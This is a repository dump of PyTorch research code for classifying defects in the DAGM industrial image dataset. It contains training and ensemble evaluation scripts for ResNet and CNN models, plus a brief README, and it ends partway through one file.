groups=1, bias=True) \n# torch.nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1)\n \ndef weights_init(m):\n classname = m.__class__.__name__\n# print(classname) \n if classname.find('Linear') != -1:\n nn.init.xavier_uniform(m.weight)\n# m.weight.data.normal_(0.0, 0.02)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n \n elif classname.find('Conv') != -1:\n nn.init.xavier_uniform(m.weight)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n# m.weight.data.normal_(0.0, 0.1)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.1)\n m.bias.data.fill_(0)\n\nclass Commander :\n \n def __init__(self, args, data):\n \n self.args = args\n self.data = data\n \n self.featureC = self.args.feature_shape[0]\n self.featureH = self.args.feature_shape[1] \n self.featureW = self.args.feature_shape[2]\n \n self.modelFilePath = \"models/\"\n# self.modelFilePath = self.modelFilePath + self.args.load_folder_file[1] + \"/\"\n# if not os.path.exists(self.modelFilePath):\n# os.mkdir(self.modelFilePath) \n \n \n self.resultFolderPath = \"results/\"\n if not os.path.exists(self.resultFolderPath):\n os.mkdir(self.resultFolderPath) \n \n \n self.Sigmoid = nn.Sigmoid()\n self.softmax = nn.Softmax() \n\n \n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \n note = Element(\"TrainingInformation\")\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\n SubElement(note, \"BatchSize\").text = str(batchSize) \n SubElement(note, \"MinCost\").text = str(minCost)\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\n SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + \"training_imformation.xml\")\n \n def createModelInformationXML(self): \n note = Element(\"ModelSetting\")\n to = Element(\"ModelName\")\n to.text = self._graphName \n note.append(to)\n# SubElement(note, \"FeatureWidth\").text = str(self._featureShape[0])\n# SubElement(note, \"FeatureHeight\").text = str(self._featureShape[1]) \n# SubElement(note, \"LabelSize\").text = str(self._label_size)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + self._graphName + \".xml\")\n# \n \n def loadModel(self, path):\n \n network = 0\n \n try: \n network = torch.load(path, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n# print(\"--------\" + path + \" is restored--------\")\n \n except:\n print(\"--------There are no models.--------\") \n pass\n \n \n if self.args.isGPU:\n network.cuda()\n else :\n network.cpu()\n \n return network\n \n \n def getCurrentAccuracy(self, net, batch_size, isTrainData=False):\n \n net.eval()\n \n channel = self.args.feature_shape[0]\n height = self.args.feature_shape[1]\n width = self.args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = dataset.images \n Ynp = dataset.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n Ys_var = Ys_var.cuda()\n \n output_var = net(Xs_var)\n output_var = self.softmax(output_var)\n \n _, prediction = torch.max(output_var,1)\n \n# for k in range(batch_size):\n# plt.imshow(Xnp[k], cmap='gray')\n# plt.show()\n# plt.imsave( 'a.png', Xnp[k], cmap='gray')\n# print(prediction)\n \n accuracy = (prediction==Ys_var).double().sum()/output_var.size()[0] \n# print(accuracy)\n if self.args.isGPU:\n accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n \n\n return avg_accuracy\n \n \n \n def getEachModelAccuracy(self, modelList, isTrainData=False):\n \n \n for model in modelList:\n print('|========================================================|')\n# print( model)\n modelPath = self.modelFilePath + model[0] + \"/\"\n# print(modelPath)\n modelFilePath = modelPath + model[1] + '_all.pkl' \n# print(modelFilePath)\n net = self.loadModel(modelFilePath)\n \n accuracy = self.getCurrentAccuracy( net, batch_size=self.args.batch_size, isTrainData=isTrainData)\n \n \n # print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n print(\"|=====\", modelFilePath, \"=====|\")\n print(\"|===== Accuracy : %.1f\" % (accuracy*100.), \"% ===========|\")\n print('|========================================================|')\n\n return 0\n \n\n \n def getEnsembleAccuracy(self, model_list, Xs_var):\n ensemble_result = bool\n iterNo = 0\n for model in model_list:\n \n modelPath = self.modelFilePath + model[0] + \"/\"\n modelFilePath = modelPath + model[1] + \"_all.pkl\"\n net = self.loadModel(modelFilePath)\n net.eval() \n output_var = net(Xs_var)\n output_var = self.softmax(output_var)\n \n if self.args.isGPU:\n output_var = output_var.cpu()\n \n if iterNo>0:\n ensemble_result += output_var\n else:\n ensemble_result = output_var\n \n iterNo += 1\n \n ensemble_result = ensemble_result/len(model)\n \n return ensemble_result\n \n \n def getEnsembleAccuracyForTest(self, model_list, batch_size, isTrainData=False):\n \n channel = self.args.feature_shape[0]\n height = self.args.feature_shape[1]\n width = self.args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = dataset.images \n Ynp = dataset.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n \n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n# Ys_var = Ys_var.cuda()\n \n \n ensemble_result = self.getEnsembleAccuracy( model_list, Xs_var)\n \n \n if self.args.isGPU:\n ensemble_result = ensemble_result.cpu()\n \n _, prediction = torch.max(ensemble_result, 1)\n accuracy = (prediction==Ys_var).double().sum()/ensemble_result.size()[0] \n \n# if self.args.isGPU:\n# accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n print('|========================================================|')\n print('|========================================================|')\n print(\"|===== Ensemble accuracy : %.1f\" % (avg_accuracy*100.), \"% =====|\")\n print('|========================================================|')\n print('|========================================================|')\n \n return avg_accuracy\n \n\nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\n 'isGPU' : True, # False, # True, \n 'load_folder_file': [(\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet34v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n (\"DAGM2_resnetJK0_resnet50v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet101v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet152v1_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k4_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k8_32_12\",'recent')],\n 'featureType' : 'block', # block \\ full\n 'label_format' : 2,\n 'classNoList' : [1,2,3,4,5,6],\n 'feature_shape' : [1, 32, 32], # channel, H, W \n 'label_size' : 12, # index 0 : something we don't know \n 'batch_size' : 256, \n }) \n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n import dagmCV2 as DAGM\n\n# dagm = DAGM.DAGM(args.dataPath) \n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format) \n commander = Commander( args=args, data=dagm) \n commander.data.getBlockImages(blockH=args.feature_shape[1], blockW=args.feature_shape[2], \n nOKperClass=200, nNGperClass=200, classNoList=args.classNoList, \n label_type='index', isTrain=False)\n \n commander.getEachModelAccuracy(modelList=args.load_folder_file, isTrainData=False)\n \n commander.getEnsembleAccuracyForTest(model_list=args.load_folder_file, \n batch_size=args.batch_size, isTrainData=False)\n \n# if args.isGPU:\n# accuracy_test = accuracy_test.cpu()\n \n# print('=====================================================================') \n## print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n# print(\"Accuracy for test-data : %.1f\" % (accuracy_test*100.), \"%\")\n# print('=====================================================================') \n\n "
},
{
"alpha_fraction": 0.6767676472663879,
"alphanum_fraction": 0.7171717286109924,
"avg_line_length": 27.285715103149414,
"blob_id": "e7ddad42c603e3bdc0cd2d81d7ac0ae0a0f7cda9",
"content_id": "c151cd627eba6fcad5753c8e5221d1698ea137f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 198,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 7,
"path": "/README.md",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# Defect-Inspection-for-DAGM\n\n## Data-set \n##### First version\n* https://resources.mpi-inf.mpg.de/conference/dagm/2007/prizes.html\n##### Second version\n* https://hci.iwr.uni-heidelberg.de/node/3616\n"
},
{
"alpha_fraction": 0.487930566072464,
"alphanum_fraction": 0.501582145690918,
"avg_line_length": 41.44529724121094,
"blob_id": "684bb5508fdc73a4aa5839e496597719346fc817",
"content_id": "28f349a9145be42b1c97dc4e4b054b42681e46e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22138,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 521,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_cnn_train.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n#import tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n\n\nsys.path.insert(0, 'networks')\n\n\nfrom resnetJK0 import resnet18v1 as Network\n#from cnn0 import Conv12k8 as Network\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#import glob\n#import random\n\n# torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True) \n# torch.nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1)\n \ndef weights_init(m):\n classname = m.__class__.__name__\n# print(classname) \n if classname.find('Linear') != -1:\n nn.init.xavier_uniform(m.weight)\n# m.weight.data.normal_(0.0, 0.02)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n \n elif classname.find('Conv') != -1:\n nn.init.xavier_uniform(m.weight)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n# m.weight.data.normal_(0.0, 0.1)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.1)\n m.bias.data.fill_(0)\n\nclass Commander :\n \n def __init__(self, args, data):\n \n self.args = args\n self.data = data\n \n self.featureC = self.args.feature_shape[0]\n self.featureH = self.args.feature_shape[1] \n self.featureW = self.args.feature_shape[2]\n \n self.modelFilePath = \"models/\"\n if not os.path.exists(self.modelFilePath):\n os.mkdir(self.modelFilePath) \n self.modelFilePath = self.modelFilePath + self.args.load_folder_file[0] + \"/\"\n if not os.path.exists(self.modelFilePath):\n os.mkdir(self.modelFilePath) \n# self.modelFilePath = self.modelFilePath + self.args.load_folder_file[1] + \"/\"\n# if not os.path.exists(self.modelFilePath):\n# os.mkdir(self.modelFilePath) \n \n \n self.resultFolderPath = \"results/\"\n if not os.path.exists(self.resultFolderPath):\n os.mkdir(self.resultFolderPath) \n \n \n \n self.network = Network(self.args.feature_shape, self.args.label_size) \n# self.network.apply(weights_init) \n \n self.optimalModelPath = self.modelFilePath + self.args.optimalModelName + '_all.pkl'\n self.optimalParamsPath = self.modelFilePath + self.args.optimalModelName + '_params.pkl'\n self.backupModelPath = self.modelFilePath + 'recent_all.pkl'\n self.backupParamsPath = self.modelFilePath + 'recent_params.pkl' \n self.saveModelPath = self.modelFilePath + self.args.save_folder_file[1] + '_all.pkl'\n self.saveParamsPath = self.modelFilePath + self.args.save_folder_file[1] + '_params.pkl' \n self.loadModelPath = self.modelFilePath + self.args.load_folder_file[1] + '_all.pkl'\n self.loadParamsPath = self.modelFilePath + self.args.load_folder_file[1] + '_params.pkl' \n print(\"Model path :\", self.loadModelPath)\n \n if self.args.load_model: \n try: \n self.network = torch.load(self.loadModelPath, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n print(\"\\n--------\" + self.args.load_folder_file[1] + \" is restored--------\\n\")\n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n print(\"\\n--------First learning.--------\\n\")\n pass\n else: \n print(\"\\n--------First learning.--------\\n\")\n \n \n if self.args.isGPU:\n self.network.cuda()\n else :\n self.network.cpu()\n \n self.Sigmoid = nn.Sigmoid()\n self.Relu = nn.ReLU()\n self.softmax = nn.Softmax() \n self.optimizer = torch.optim.Adam(self.network.parameters(), lr=self.args.learning_rate, weight_decay=1e-5)\n# self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=self.args.learning_rate, momentum=0.9, weight_decay=1e-5)\n# self.optimizer = torch.optim.SGD(self.network.parameters(), lr=self.args.learning_rate, momentum=0.9, weight_decay=1e-5)\n\n\n# self.loss_func = nn.MSELoss() \n self.loss_func = nn.CrossEntropyLoss()\n# self.loss_func = nn.BCELoss(size_average=False)\n \n \n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \n note = Element(\"TrainingInformation\")\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\n SubElement(note, \"BatchSize\").text = str(batchSize) \n SubElement(note, \"MinCost\").text = str(minCost)\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\n SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + \"training_imformation.xml\")\n \n def createModelInformationXML(self): \n note = Element(\"ModelSetting\")\n to = Element(\"ModelName\")\n to.text = self._graphName \n note.append(to)\n# SubElement(note, \"FeatureWidth\").text = str(self._featureShape[0])\n# SubElement(note, \"FeatureHeight\").text = str(self._featureShape[1]) \n# SubElement(note, \"LabelSize\").text = str(self._label_size)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + self._graphName + \".xml\")\n# \n \n def train(self, nReDataGeneration=1, nTrainingEpochs=20, batch_size=100):\n \n self.network.train()\n \n# minCost = 100000.\n# maxAccuracy = 0.\n elapsed_time = 0.\n# current_epoch = 0\n \n # train my model\n print('Learning Started!') \n start_time = time.perf_counter()\n \n \n #############################################################3\n \n \n self.data.getBlockImages(blockH=self.featureH, blockW=self.featureW,\n nOKperClass=40, nNGperClass=40, \n classNoList=self.args.classNoList, \n label_type='index', isTrain=False)\n ############################################################# \n current_accuracy = 0\n max_accuracy = self.args.optimalAccuracyThreshold\n for i in range(nReDataGeneration):\n \n eps_time = AverageMeter()\n bar = Bar('Training '+str(i), max=self.args.nTrainingEpochs)\n end = time.time()\n \n self.data.getBlockImages(blockH=self.featureH, blockW=self.featureW, \n nOKperClass=160, nNGperClass=160, \n classNoList=self.args.classNoList, \n label_type='index', isTrain=True)\n \n Xnp = self.data.train.images\n Ynp = self.data.train.labels\n x = torch.from_numpy(Xnp.reshape([-1,self.featureC,self.featureW,self.featureH]))\n y = torch.from_numpy(Ynp)\n dataset = TensorDataset(data_tensor=x, target_tensor=y) \n self.train_loader = DataLoader(dataset, batch_size=self.args.batch_size, shuffle=True) \n \n for epoch in range(1, nTrainingEpochs+1):\n for k, [image,label] in enumerate(self.train_loader):\n \n image = Variable(image) \n label = Variable(label) \n \n if self.args.isGPU:\n image = image.cuda()\n label = label.cuda() \n \n \n self.optimizer.zero_grad()\n \n output = self.network(image)\n output = self.softmax(output)\n# print(output.size())\n# print(label.size())\n loss = self.loss_func(output, label)\n \n loss.backward()\n self.optimizer.step() \n \n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=epoch, maxeps=self.args.nTrainingEpochs, et=eps_time.avg,\n total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n \n if epoch % 2 == 0: \n print('--------------------------------------------------------------------')\n torch.save(self.network, self.saveModelPath) \n torch.save(self.network.state_dict(), self.saveParamsPath ) # It saves only the model parameters (recommended) \n \n torch.save(self.network, self.backupModelPath) \n torch.save(self.network.state_dict(), self.backupParamsPath)\n \n current_accuracy = commander.getCurrentAccuracy(batch_size=256, numIter=1, isTrainData=False)\n if self.args.isGPU:\n loss = loss.cpu() \n# current_accuracy = current_accuracy.cpu() \n# current_accuracy = current_accuracy.data.numpy()[0]\n self.network.train() \n print('|=====================================================================|') \n print('|===== Epoch : %04d' % (i*nTrainingEpochs + epoch), \"======================|\" )\n print('|===== Loss : ', loss.data.numpy()[0], \"========================|\" )\n print(\"|===== Current accuracy : %.1f\" % (current_accuracy*100.), \"% =====|\")\n print('|=====================================================================|') \n if current_accuracy >= max_accuracy:\n max_accuracy = current_accuracy \n torch.save(self.network, self.optimalModelPath)\n torch.save(self.network.state_dict(), self.optimalParamsPath) \n break\n \n if current_accuracy >= max_accuracy: \n break\n \n bar.finish()\n \n elapsed_time = (time.perf_counter() - start_time)\n \n# accuracy_train = self.getCurrentAccuracy(batch_size=self.args.batch_size, isTrainData=True) \n# accuracy_test = self.getCurrentAccuracy(batch_size=self.args.batch_size, isTrainData=False) \n# if args.isGPU:\n# accuracy_train = accuracy_train.cpu() \n# accuracy_test = accuracy_test.cpu()\n \n print('=====================================================================') \n# print(\"Accuracy for training data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n# print(\"Accuracy for test data : %.1f\" % (accuracy_test.data.numpy()[0]*100.), \"%\")\n print('Elapsed %.3f seconds.' % elapsed_time)\n print('%.0f h' % (elapsed_time/3600), '%.0f m' % ((elapsed_time%3600)/60) , '%.0f s' % (elapsed_time%60) )\n print('Learning Finished!') \n print('=====================================================================')\n \n \n def getCurrentAccuracy(self, batch_size, numIter=1, isTrainData=False):\n \n self.network.eval()\n \n channel = args.feature_shape[0]\n height = args.feature_shape[1]\n width = args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = self.data.test.images \n Ynp = self.data.test.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n Ys_var = Ys_var.cuda()\n \n output_var = self.network(Xs_var)\n output_var = self.softmax(output_var)\n \n _, prediction = torch.max(output_var,1)\n \n# for k in range(batch_size):\n# plt.imshow(Xnp[k], cmap='gray')\n# plt.show()\n# plt.imsave( 'a.png', Xnp[k], cmap='gray')\n# print(prediction)\n \n accuracy = (prediction==Ys_var).double().sum()/output_var.size()[0] \n# print(accuracy)\n if args.isGPU:\n accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n return avg_accuracy\n \n \n \n def checkTrainingResult(self, nOutput=1, isResultSave=True):\n \n self.network.eval()\n \n channel = args.feature_shape[0]\n height = args.feature_shape[1]\n width = args.feature_shape[2] \n\n \n Xnp = self.data.test.images\n Ynp = self.data.test.labels\n \n \n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n dataset = TensorDataset(data_tensor=x, target_tensor=y) \n test_loader = DataLoader(dataset, batch_size=nOutput, shuffle=True) \n \n\n tester = iter(test_loader)\n Xs_tensor, Ys_tensor = tester.next()\n \n Xs_var = Variable(Xs_tensor)\n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n \n output_var, indices, pool_sizes = self.convNet(Xs_var, self.args.isGPU)\n output_var = self.deconvNet(output_var, indices, pool_sizes)\n# if self.last_activation=='S':\n# output = self.Sigmoid(output)\n# output = self.Softmax2d(output)\n\n if self.args.isGPU:\n Xs_var = Xs_var.cpu()\n output_var = output_var.cpu()\n \n# out_img = torch.squeeze(output.data)\n original_img = Xs_var.data.view(-1,height,height) \n label_img = Ys_tensor.view(-1,height,width)\n outputSize = output_var.data.size()\n out_img = output_var.data.view(-1,outputSize[2],outputSize[3])\n \n for i in range(nOutput): \n originalImg = original_img[i].numpy()\n# print(originalImg)\n labelImg = label_img[i].numpy()\n outputImg = out_img[i].numpy()\n # a colormap and a normalization instance\n cmap = plt.cm.jet\n norm = plt.Normalize(vmin=outputImg.min(), vmax=outputImg.max()) \n # map the normalized data to colors\n resultImg = cmap(norm(outputImg))\n \n if isResultSave:\n# filePath = self.resultFolderPath + 'original%d.png' % i\n# plt.imsave(filePath, originalImg, cmap='gray') \n# filePath = self.resultFolderPath + 'label%d.png' % i\n# plt.imsave(filePath, labelImg, cmap='gray') \n filePath = self.resultFolderPath + 'output%d.png' % i\n plt.imsave(filePath, outputImg, cmap='gray')\n \n \n# from PIL import Image \n# buffer = np.hstack((originalImg, resultImg)) \n# filePath = self.resultFolderPath + 'compared_result%d.png' % i\n# plt.imsave(filePath, buffer, cmap='gray')\n \n filePath = self.resultFolderPath + 'heatmap%d.png' % i\n plt.imsave(filePath, resultImg) \n \n \n plt.subplot(1,3,1) \n plt.imshow(originalImg, cmap='gray') \n plt.subplot(1,3,2)\n plt.imshow(outputImg, cmap='gray')\n plt.subplot(1,3,3)\n plt.imshow(resultImg)\n plt.show() \n \n print(\"Input size (H, W) :\", originalImg.shape)\n print(\"Output size (H, W) :\", (out_img.size()[1], out_img.size()[2]))\n print(\"========================================================\")\n print(\"========================================================\")\n \n \n\nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\n 'training' : False ,\n 'isGPU' : True, # False, # True,\n 'load_model': True, \n 'load_folder_file': (\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n 'save_folder_file': (\"DAGM2_resnetJK0_resnet18v1_32_12\",'optimal0'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n 'optimalModelName' : 'optimal0',\n 'optimalAccuracyThreshold' : 0.99,\n 'featureType' : 'block', # block \\ full\n 'label_format' : 2,\n 'classNoList' : [1,2,3,4,5,6],\n 'feature_shape' : [1, 32, 32], # channel, H, W \n 'label_size' : 12, # index 0 : something we don't know\n 'nReDataExtraction' : 2000,\n 'nTrainingEpochs': 50, \n 'batch_size' : 256, \n 'learning_rate' : 1e-5,\n }) \n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n import dagmCV2 as DAGM\n\n# dagm = DAGM.DAGM(args.dataPath) \n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format) \n commander = Commander( args=args, data=dagm) \n \n if(args.training==True): \t \n commander.train( nReDataGeneration=args.nReDataExtraction, nTrainingEpochs=args.nTrainingEpochs, batch_size=args.batch_size) \n \n elif(args.training==False): \n commander.data.getBlockImages(blockH=args.feature_shape[1], blockW=args.feature_shape[2], \n nOKperClass=1, nNGperClass=1, classNoList=args.classNoList, \n label_type='index', isTrain=False)\n \n accuracy_test = commander.getCurrentAccuracy(batch_size=100, numIter=1, isTrainData=False) \n \n# if args.isGPU:\n# accuracy_test = accuracy_test.cpu()\n \n print('=====================================================================') \n# print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n print(\"Accuracy for test-data : %.1f\" % (accuracy_test*100.), \"%\")\n print('=====================================================================') \n\n "
},
{
"alpha_fraction": 0.5684412717819214,
"alphanum_fraction": 0.587317705154419,
"avg_line_length": 32.67557144165039,
"blob_id": "25bb1f471cc5671ac3c90a7f1211acda3a29a323",
"content_id": "94c0f5052088ed2aa85aa3d89d2467c200326934",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8847,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 262,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_fcn_evaluation_visdom.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\n#import matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\nsys.path.append(\"../../ML_utils\") # parent directory\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if 